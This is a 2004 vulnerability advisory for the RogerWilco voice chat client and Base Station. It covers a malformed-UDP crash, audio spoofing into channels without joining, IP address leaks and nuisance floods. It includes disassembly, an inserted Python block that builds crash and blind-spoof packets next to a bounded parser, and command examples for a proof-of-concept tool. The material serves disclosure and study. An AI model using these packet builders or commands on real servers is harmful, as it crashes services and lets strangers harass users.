rogerwilco2.txt
Posted Mar 31, 2004
Authored by Luigi Auriemma | Site aluigi.altervista.org

RogerWilco versions 1.4.1.6 and below and RogerWilco Base Station versions 0.30a and below suffer from multiple bugs, from a crash on a malformed UDP packet to 'voice' traffic being spoofed into a channel by a host that has never joined it. Quite a few amusing problems are listed.

tags | advisory, udp, spoof
SHA-256 | 22ab3fb2653158c6541bf495cfa5519f2bf1f7f1d2a4c897d0324b8762076abc


#######################################################################

Luigi Auriemma

Application: RogerWilco
https://rogerwilco.gamespy.com
Versions: - RogerWilco <= 1.4.1.6
- RogerWilco Base Station <= 0.30a
Platforms: Windows, MacOS, Linux and FreeBSD
Bugs: A] Crash with malformed UDP packet
B] "Voices from the deep" bug
C] Privacy problems
D] Annoying attacks
Risk: (not needed)
Exploitation: remote, versus server and client (channel broadcast)
Date: 31 Mar 2004
Author: Luigi Auriemma
e-mail: aluigi@altervista.org
web: https://aluigi.altervista.org


#######################################################################


1) Introduction
2) Bugs summary
3) Bugs details
4) The Code
5) The Code examples
6) Fix


#######################################################################

===============
1) Introduction
===============


RogerWilco is a voice chat application for Windows and MacOS; dedicated
servers (called "Base Stations") are also available for Windows, Linux
and FreeBSD x86.
The program is distributed by Gamespy, is no longer supported and is
affected by some critical security bugs, but it is still used by a lot
of people.

RogerWilco is full of security bugs that are very interesting to study,
and this time I want to talk about some types of bugs caused not by
programming errors but by how the software has been designed.

To make it easier to follow, this advisory/paper is divided into two
sections, one with a quick summary of the vulnerabilities and another
with all the details.


#######################################################################

===============
2) Bugs summary
===============


----------------------------------
A] Crash with malformed UDP packet
----------------------------------

A specially crafted UDP packet (large, and with some large values in
it) sent to RogerWilco's UDP audio port immediately crashes the server
or the client.


-----------------------------
B] "Voices from the deep" bug
-----------------------------

Anyone can talk into a channel without being in it, simply by sending
the audio stream directly to the server or to a specific client inside
that channel.
The audio stream can be delivered to everyone in the channel or only to
a specific user or group of users.
Only transmission is possible, not reception.


-------------------
C] Privacy problems
-------------------

Both client and server report a lot of information: the server, for
example, reveals the IP addresses and ports used by all clients, and
clients reveal the IP address of the server they are connected to.


-------------------
D] Annoying attacks
-------------------

The dedicated server prints the message "nothing read from recv" when
someone connects to its port 18009 and disconnects without sending
data.
By opening a lot of empty connections, an attacker floods the server
administrator's console with these messages.

The GUI application redraws its entire window when a user enters,
exits or changes nickname. If someone changes nickname endlessly, all
the users in the same channel suffer side effects such as being unable
to control their application.


#######################################################################

===============
3) Bugs details
===============


----------------------------------
A] Crash with malformed UDP packet
----------------------------------

RogerWilco uses a UDP port for the transmission and reception of the
audio stream.
Each UDP packet starts with a first byte that is always 0x0f, followed
by the name of the channel into which the sound is transmitted,
terminated by a NULL byte.
After that come the fields describing which user or users must receive
the audio stream and whether it must be retransmitted.

The users who must receive the data (forwarded by the server) are
listed as 16-bit fields containing their IDs (each user receives an ID
assigned by the server when he joins).
The last piece of the packet is the audio data block.

A quick example of an audio packet is the following:

"\x0f" // always 0x0f
"channel\0" // name of the channel in which to transmit the stream
"\xff\xff" // this data "should" represent the type of transmission
"\x7f" // as above, I don't have details (not important here)
"\x00" // I don't know its usage (not important here)
"\x01" // number of target IDs (server excluded), max 127
"\x00\x00" // ID 0, the server's ID (which must receive the data)
"\x00\x01" // ID 1, the user with ID 1 (who must receive the data)
"data..." // audio stream

RogerWilco handles the packet as follows: the program reads up to the
"number of target IDs" byte and then starts a loop that reads that many
16-bit target ID fields after it, without checking that they are
actually present in the received packet.
The following is the piece of code doing that (from RWNET.DLL):

:100050BF 668B06 mov ax, word ptr [esi] ; read next 16-bit ID from the packet (ESI is never bounds-checked)
:100050C2 50 push eax
:100050C3 E81C1D0000 Call 10006DE4 (WSOCK32.ntohs) ; byte-swap it to host order
:100050C8 8B4D58 mov ecx, dword ptr [ebp+58] ; destination ID array
:100050CB 83C602 add esi, 00000002 ; advance the packet pointer
:100050CE 66890479 mov word ptr [ecx+2*edi], ax ; store the ID at index EDI
:100050D2 8B442418 mov eax, dword ptr [esp+18] ; loop bound, taken from the count byte
:100050D6 47 inc edi
:100050D7 3BF8 cmp edi, eax ; loop until EDI reaches the declared count
:100050D9 7CE4 jl 100050BF

If an attacker sends a long channel name (924 chars, for example) and
declares 127 IDs BUT does not actually include them in the packet, the
loop keeps reading through ESI past the end of the received data, into
memory that is not allocated, and the program crashes.

In the dedicated server the crash happens at offset 100050BF of
RWNET.DLL, while in the GUI program it happens at offset 1000544B of
NETWORK.DLL (the vulnerable instructions are the same).


-----------------------------
B] "Voices from the deep" bug
-----------------------------

RogerWilco is composed of a TCP section and a UDP section: the first
manages users, nicknames, IDs, access control and other things, while
the second is used only for the audio stream.

The interesting fact is that joining a channel (TCP section) is not
needed to transmit audio: it is enough to send the UDP stream to the
server, which will handle it as usual.

This "structure" lets anyone talk anonymously into any channel of any
server without being stopped and without limits, because all limits
are enforced in the TCP section; for example we can put our voice on a
server even if it is password protected.

The only two small and almost nonexistent limits I have found are that
data can only be sent and not received, and that the IDs of the users
inside the channel must be known for the stream to reach them.

RogerWilco supports a maximum of 127 IDs for each sound stream (see the
explanation of the previous bug), so if it is impossible to enter the
channel of the server to get the real user IDs (for example because it
is protected by an unknown password), it is always possible to use the
IDs from 0 to 127, because IDs are sequential and are always reused, so
I "think" it is rare to find a server with users having IDs over 127.
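The packet layout from section 3A and the direct-to-server stream from section 3B, as an added Python example (mine, not the advisory's code and not the wilco tool): a builder for the audio datagram, a bounded parser that refuses the packet the RWNET.DLL loop reads blindly, and a count of how many bytes that loop would read past the end of a 3A trigger packet. Assumptions: the four bytes between the channel name and the count byte are copied verbatim from the sample packet above (their meaning is not given), the loop consumes the server ID plus "count" target IDs exactly as in the sample packet, and the channel names, IDs and audio bytes used here are constructed for the example.

```python
import struct

AUDIO_MAGIC = 0x0F      # first byte of every audio datagram
SERVER_ID = 0           # the server's own ID, first 16-bit field after the count byte
MAX_TARGETS = 127       # largest value the count byte may carry (server excluded)
# The four bytes between the channel name and the count byte are copied from the
# advisory's sample packet; their meaning is not documented there (assumption).
UNKNOWN_HDR = b"\xff\xff\x7f\x00"


def build_audio_packet(channel, targets, audio, unknown_hdr=UNKNOWN_HDR):
    """Build an audio datagram in the layout of section 3A.

    targets are the user IDs (server excluded) that must receive the stream.
    This is all that 3B needs: no TCP join, just this datagram sent to the
    server's UDP audio port.
    """
    targets = list(targets)
    if b"\x00" in channel:
        raise ValueError("channel name cannot contain a NUL byte")
    if len(targets) > MAX_TARGETS:
        raise ValueError("at most %d target IDs per packet" % MAX_TARGETS)
    ids = [SERVER_ID] + targets
    return (bytes([AUDIO_MAGIC]) + channel + b"\x00" + unknown_hdr
            + bytes([len(targets)]) + struct.pack(">%dH" % len(ids), *ids) + audio)


def id_bytes_missing(pkt):
    """How many bytes the count-driven loop in RWNET.DLL would read past the end
    of this datagram (0 for a well-formed packet). Assumes the loop reads the
    server ID plus `count` target IDs, as in the sample packet."""
    nul = pkt.find(b"\x00", 1)
    if len(pkt) < 2 or pkt[0] != AUDIO_MAGIC or nul < 0 or len(pkt) < nul + 6:
        raise ValueError("not a complete audio header")
    count = pkt[nul + 5]          # count byte sits after the 4 unknown bytes
    ids_start = nul + 6
    return max(0, ids_start + 2 * (count + 1) - len(pkt))


def parse_audio_packet(pkt):
    """Bounded parser: every length is checked before the read the DLL does blindly."""
    if len(pkt) < 2 or pkt[0] != AUDIO_MAGIC:
        raise ValueError("bad magic byte")
    nul = pkt.find(b"\x00", 1)
    if nul < 0:
        raise ValueError("channel name not NUL-terminated")
    channel = pkt[1:nul]
    off = nul + 1
    if len(pkt) < off + 5:
        raise ValueError("truncated header")
    unknown_hdr = pkt[off:off + 4]
    count = pkt[off + 4]
    off += 5
    if count > MAX_TARGETS:
        raise ValueError("count byte %d exceeds %d" % (count, MAX_TARGETS))
    need = 2 * (count + 1)        # server ID plus `count` target IDs
    if len(pkt) - off < need:
        raise ValueError("count byte promises %d ID bytes, only %d present"
                         % (need, len(pkt) - off))
    ids = struct.unpack_from(">%dH" % (count + 1), pkt, off)
    off += need
    return {"channel": channel, "unknown_hdr": unknown_hdr, "server_id": ids[0],
            "targets": list(ids[1:]), "audio": pkt[off:]}


def is_malformed(pkt):
    """True when the bounded parser rejects the datagram."""
    try:
        parse_audio_packet(pkt)
    except ValueError:
        return True
    return False


def crash_packet(channel_len=924, count=MAX_TARGETS):
    """The 3A trigger: long channel name, count byte at its maximum, no ID fields at all."""
    return bytes([AUDIO_MAGIC]) + b"A" * channel_len + b"\x00" + UNKNOWN_HDR + bytes([count])


def blind_spoof_packet(channel, audio):
    """The 3B fallback when the real IDs are unknown: address the server plus IDs 1..127."""
    return build_audio_packet(channel, range(1, MAX_TARGETS + 1), audio)


if __name__ == "__main__":
    good = build_audio_packet(b"channel", [1], b"data")   # constructed sample
    print(good)
    print(parse_audio_packet(good))
    bad = crash_packet()
    print("malformed:", is_malformed(bad), "bytes read past the end:", id_bytes_missing(bad))
```

The 924-byte channel name is not what breaks the loop; the count byte is. The builder never lets the declared count disagree with the ID fields it emits, and the parser compares the declared count with the bytes actually left in the datagram before touching them, which is the check the instruction at 100050BF lacks.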


-------------------
C] Privacy problems
-------------------

When a user enters a channel, the server immediately sends him the
whole list of users inside the channel with their IDs (tag 0x0a0f),
nicknames (tag 0x0c0f) and moreover their source IP addresses and ports
(tag 0x0f0f).

The same happens if we try to connect to a client (exactly as we do
with servers, because the UDP and TCP ports are ALWAYS open): we
receive the tag 0x010f showing the IP address of the server in which
the user is talking.

The result is that if a user in a channel doesn't like what another
user is saying, he can easily attack exactly that user, using the IP
address and port the server has handed him.


-------------------
D] Annoying attacks
-------------------

There is not much to say about these so-called "attacks". The message
"nothing read from recv" is printed to the dedicated server console
when a client connects to port 18009 and disconnects without sending
data.
Port 18009 is something like a mini web server showing the channels
currently hosted on the dedicated server and some other information.

More interesting is the problem in the GUI program: the tag 0x100f is
used by users to change their nickname while they are talking in a
channel.
Changing one's nickname continually produces visual disturbances for
the other users, because the program window is recreated each time and
the users cannot control the program during this annoying refresh.


#######################################################################

===========
4) The Code
===========


"Testing tool for RogerWilco 0.4" released:

https://aluigi.altervista.org/poc/wilco.zip


#######################################################################

====================
5) The Code examples
====================


The following are some quick and simple examples of how to test all the
problems described in this and in the previous advisories for
RogerWilco using my proof-of-concept tool.
"server" and "client" stand for the IP address or hostname of the host
we want to test (e.g. localhost):

----------------------------------
A] Crash with malformed UDP packet
----------------------------------

wilco -10 server
or
wilco -10 -p 3783 server


-----------------------------
B] "Voices from the deep" bug
-----------------------------

wilco -9 server

then we must connect our RogerWilco client to localhost:3780/CHANNEL,
where CHANNEL is the channel into which we want to transmit our sound.
Then we simply use our client normally (for example pressing F12 to
talk).


wilco -8 -c mychannel server

this option transmits a nasty, annoying noise to all the users in
"mychannel".


-------------------
C] Privacy problems
-------------------


wilco server
or
wilco client
or
wilco -p 3783 server
or
wilco -p 3783 -c mychannel -n yournickname server

The tool shows all the information received from the server or the
client.

We can also use the proxy option together with a RogerWilco client to
get the information in real time:

wilco -x server


-------------------
D] Annoying attacks
-------------------


wilco -6 -p 3783 server
and
wilco -7 server
or
wilco -7 client


#######################################################################

======
6) Fix
======


RogerWilco is no longer supported, so no vendor fix is available; the
only mitigation is to stop running it or to restrict access to its TCP
and UDP ports at the network level.


#######################################################################



---
Luigi Auriemma
https://aluigi.altervista.org